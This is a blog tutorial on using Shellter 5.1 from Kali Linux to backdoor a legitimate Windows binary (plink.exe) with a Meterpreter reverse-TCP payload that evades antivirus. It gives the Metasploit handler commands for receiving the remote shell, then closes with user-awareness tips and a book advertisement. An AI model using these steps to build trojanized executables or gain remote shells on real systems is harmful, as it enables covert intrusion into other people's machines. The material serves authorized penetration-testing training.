Anti-Virus Bypass with Shellter 5.1 on Kali Linux

Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 5.1 shellcode injection tool! The latest version of Shellter for pentesters includes a “stealth” mode that retains the functionality of the original host program.

Shellter works by taking a legit Windows .exe file, adds the shell code to it and then does a great job of modifying the file for AV bypass. The program’s automatic mode makes the whole process very pain free. In this tutorial I used Kali Linux 2.0 as the host and a Windows system as the target.

The new version of Shellter is not included in the repositories yet, so if you want the latest version you will need to download the zip file and install it manually.

So enough talk, let’s see it in action!

(Note: As always, never attempt to access a system that you do not have express written permission to do so. Doing so is illegal and you could end up in jail.)

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )

I saved the extracted folder to the /root/Desktop folder. You will need to make the shellter.exe file executable with the chmod command.

2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.

3. Change to the ‘/root/Desktop/shellter’ directory.

4. Start Shellter – type, “wine shellter.exe”

Shellter Kali 1

5. Enter “A” for automatic

6. At the PE Target Prompt, enter “plink.exe”

7. When prompted to enable stealth mode enter “Y”:
Shellter Kali 2

This new feature allows the backdoored file to still function as originally file. A big help for Red Team pentesters.

8. When prompted for Payloads select “L” and then “1” for Meterpreter_Reverse_TCP.

9. Enter your Kali IP address for LHOST.

10. Enter a port to use (I used 4545)

Shellter Kali 3

Shellter will then add PolyMorphic code and Obfuscate the file. When done you will see:
Shellter Kali 4

You will now have a ‘plink.exe’ (the shellcoded file) and ‘plink.exe.bak’ (the original file) in the Shellter directory.

11. Now we need to start a listener service on the Kali system using the same settings from above:

  • start Metasploit (‘msfconsole’ in a terminal)
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost 192.168.1.39
  • set lport 4545
  • exploit

Shellter Kali 5

12. Copy the ‘plink.exe’ file to the Windows system:
Shellter Kali 6

13. Now, in Windows, If you run plink.exe from the command prompt:

Shellter Kali 7

It lists the help information for the file, but does not trigger the remote shell yet. But if we actually use plink to connect to another system (a Raspberry Pi) as seen below:

Shellter Kali 8

Notice we get the Raspberry Pi ssh login prompt through Plink, but we also get a remote session to the Windows box:

Shellter Kali 9

We can run “sysinfo” to view information about the computer:

Shellter Kali 10

Success!

Conclusion

As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great but it can’t stop everything, you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything and never open unsolicited or suspicious attachments in e-mails. If you don’t know if you should click on something, ask your IT department. A little user vigilance can go a long way at protecting your network!

If you enjoyed this tutorial, check out my new book, “Intermediate Security Testing with Kali Linux 2“.

Advertisements

Intermediate Security Testing with Kali Linux 2 Released!

Security Series

Introducing my new book, “Intermediate Security Testing with Kali Linux 2“!

The second book in my Kali Linux series has been released. Picking up where “Basic Security Testing with Kali Linux” left off, this book delves deeper into using post exploitation techniques. It also covers Web Application testing using tools like Burp Suite. It then turns to testing smart devices like Android Phones and tablets. And even includes an entire section on using the Forensics tools in Kali to perform computer security testing.

Topics Include:

  • New Metasploit Features and Commands
  • Creating Shells with Msfvenom
  • Post Modules & Railgun
  • PowerShell for Post Exploitation
  • Web Application Pentesting
  • How to use Burp Suite
  • Security Testing Android Devices
  • Forensics Tools for Security Testing
  • Security Testing an Internet of Things (IoT) Device

And much, much more!

This book was originally written for the first version of Kali and was ready to be released last month. But as the new Kali 2.0 was released I held the book back and completely updated the entire book from beginning to end to cover the new OS and any tool changes. So in essence as it took about a year and a half to write this book, all the information in it has been updated as of this month!

If you are still using the original Kali, not a problem the tools work the same in both versions, though I do recommend updating to the new Kali 2.0 as it has a much better interface and menu system. If you are still using Backtrack, please update to Kali 2 you will thank yourself!

The second book dwarfs the first in both size and content. I took to heart all of the feedback from my first book. I had a lot of request to add more tool coverage, so I added two entire chapters covering included tools and their use. Multiple people asked me to cover the forensics tools, so I added an entire section devoted to security testing with Kali’s Forensics tools. Several people had told me that the first book was confusing in places, as I had an extra month to work on the book before publishing, hopefully this book will be easier to follow and understand than the first.

I even included a chapter on testing Internet of Things (IoT) devices. As IoT devices are becoming all the rage, security testing them is of high importance. We will have an eye opening look at an actually physical security device in use today that has some serious vulnerabilities.

As always, thank you so much for your support and encouragement. The overwhelming support I have received from individual users, technical trainers, corporations, universities, law enforcement agencies and members of the military has been both humbling and an absolute honor. Thank you!

Intermediate Security Testing with Kali 2 Linux